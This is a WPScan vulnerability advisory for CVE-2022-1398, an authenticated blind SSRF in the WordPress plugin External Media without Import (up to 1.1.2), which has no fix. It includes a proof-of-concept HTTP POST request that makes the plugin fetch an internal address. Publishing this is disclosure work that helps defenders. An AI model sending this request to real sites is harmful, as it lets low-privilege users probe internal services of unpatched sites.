WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

External Media without Import <= 1.1.2 - Subscriber+ Blind SSRF

Description

The plugin does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks

Proof of Concept

Put an internal URL such as http://127.0.0.1:8080 in the "Add medias from URLs" feature of the plugin (/wp-admin/upload.php?page=add-external-media-without-import)

POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

urls=http%3A%2F%2F127.0.0.1%3A8080%2Fyolo&width=&height=&mime-type=&action=add_external_media_without_import 

Affects Plugins

external-media-without-import
No known fix - plugin closed

References

CVE
CVE-2022-1398

Classification

Type

SSRF

OWASP top 10
A1: Injection
CWE
CWE-918

Miscellaneous

Original Researcher

Luan Pedersini

Submitter

IBLISS Digital Security

Submitter website
https://ibliss.com.br
Verified

Yes

WPVDB ID
5440d177-e995-403e-b2c9-42ceda14579e

Timeline

Publicly Published

2022-04-19 (about 2 months ago)

Added

2022-04-19 (about 2 months ago)

Last Updated

2022-04-20 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us